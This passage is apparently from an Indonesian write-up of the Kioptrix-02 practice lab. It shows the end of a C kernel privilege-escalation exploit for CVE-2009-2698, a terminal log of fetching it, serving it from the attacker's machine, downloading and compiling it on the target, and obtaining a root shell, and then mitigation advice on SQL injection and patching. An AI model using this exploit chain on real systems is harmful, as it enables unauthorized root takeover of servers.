memset(x0x.sa_data,0x82,14); memset((char *)buf,0,sizeof(buf)); sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x)); sendto(fd,buf,1024,0,&x0x,sizeof(x0x)); if(getuid()==uid){ printf("[-] exploit failed, try again\n"); return -1; } close(fd); execl("/bin/sh","sh","-i",NULL); return 0; } /* eoc */ // milw0rm.com [2009-08-31] // https://raw.githubusercontent.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/master/2009/CVE-2009-2698/CVE-2009-2698.c
Selanjutnya penyerang mengunduh file tersebut dan mengirimkan ke mesin Kioptrix-02 untuk di-compile dengan gcc. Hasilnya, penyerang dapat menguasai mesin tersebut sepenuhnya yaitu berhasil meningkatkan hak akses menjadi root atau administrator pada server tersebut. Berikut ini adalah rangkaian perintah yang dilakukan.
root@kali2:~/Documents# wget https://raw.githubusercontent.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/master/2009/CVE-2009-2698/CVE-2009-2698.c --2020-04-18 20:36:05-- https://raw.githubusercontent.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/master/2009/CVE-2009-2698/CVE-2009-2698.c Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.8.133 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.8.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 2645 (2.6K) [text/plain] Saving to: ‘CVE-2009-2698.c’ CVE-2009-2698.c 100%[==================================>] 2.58K --.-KB/s in 0s 2020-04-18 20:36:05 (71.4 MB/s) - ‘CVE-2009-2698.c’ saved [2645/2645] root@kali2:~/Documents# root@kali2:~/Documents# root@kali2:~/Documents# python -m SimpleHTTPServer 9999 Serving HTTP on 0.0.0.0 port 9999 ... 192.168.216.148 - - [18/Apr/2020 20:37:57] "GET /CVE-2009-2698.c HTTP/1.0" 200 - bash-3.00$ cd /tmp bash-3.00$ bash-3.00$ wget http://192.168.216.149:9999/CVE-2009-2698.c --10:37:41-- http://192.168.216.149:9999/CVE-2009-2698.c => `CVE-2009-2698.c' Connecting to 192.168.216.149:9999... connected. HTTP request sent, awaiting response... 200 OK Length: 2,645 (2.6K) [text/plain] 0K .. 100% 360.35 MB/s 10:37:41 (360.35 MB/s) - `CVE-2009-2698.c' saved [2645/2645] bash-3.00$ ls -l total 4 -rw-r--r-- 1 apache apache 2645 Apr 18 23:36 CVE-2009-2698.c bash-3.00$ bash-3.00$ gcc -o privKioptrix02 CVE-2009-2698.c bash-3.00$ ls -l total 12 -rw-r--r-- 1 apache apache 2645 Apr 18 23:36 CVE-2009-2698.c -rwxr-xr-x 1 apache apache 6941 Apr 19 10:38 privKioptrix02 bash-3.00$ chmod +x privKioptrix02 bash-3.00$ ls -l total 12 -rw-r--r-- 1 apache apache 2645 Apr 18 23:36 CVE-2009-2698.c -rwxr-xr-x 1 apache apache 6941 Apr 19 10:38 privKioptrix02 bash-3.00$ bash-3.00$ bash-3.00$ ./privKioptrix02 sh: no job control in this shell sh-3.00# sh-3.00# ls -l total 12 -rw-r--r-- 1 apache apache 2645 Apr 18 23:36 CVE-2009-2698.c -rwxr-xr-x 1 apache apache 6941 Apr 19 10:38 privKioptrix02 sh-3.00# ./privKioptrix02 [-] check ur uid sh-3.00# sh-3.00# sh-3.00# id uid=0(root) gid=0(root) groups=48(apache) sh-3.00# sh-3.00# cd /root sh-3.00# ls -l total 80 -rw-r--r-- 1 root root 1168 Oct 7 2009 anaconda-ks.cfg -rw-r--r-- 1 root root 53255 Oct 7 2009 install.log -rw-r--r-- 1 root root 3842 Oct 7 2009 install.log.syslog sh-3.00# sh-3.00#
Lesson Learned
Dari kisah Kioptrix-02, ada pelajaran berharga yang patut diperhatikan oleh penyelenggara Sistem Elektronik, yaitu agar berhati-hati dengan serangan SQL Injection. Dalam kasus ini penyerang bisa mendapatkan limited shell. Selanjutnya, dengan memanfaatkan sistem operasi yang tidak di-patch atau di-upgrade ke versi terbaru, penyerang dapat menguasai sebuah server secara keseluruhan dan melakukan tindakan kriminal apa pun sesukanya.
Untuk melakukan mitigasi terhadap serangan SQL Injection, hendaknya dilakukan verifikasi terhadap berbagai karakter yang digunakan untuk mengisi form dalam aplikasi web. Jangan percaya pada setiap input pada form, selalu lakukan verifikasi sebelum diteruskan ke database di backend. Never Trust, Always Verify !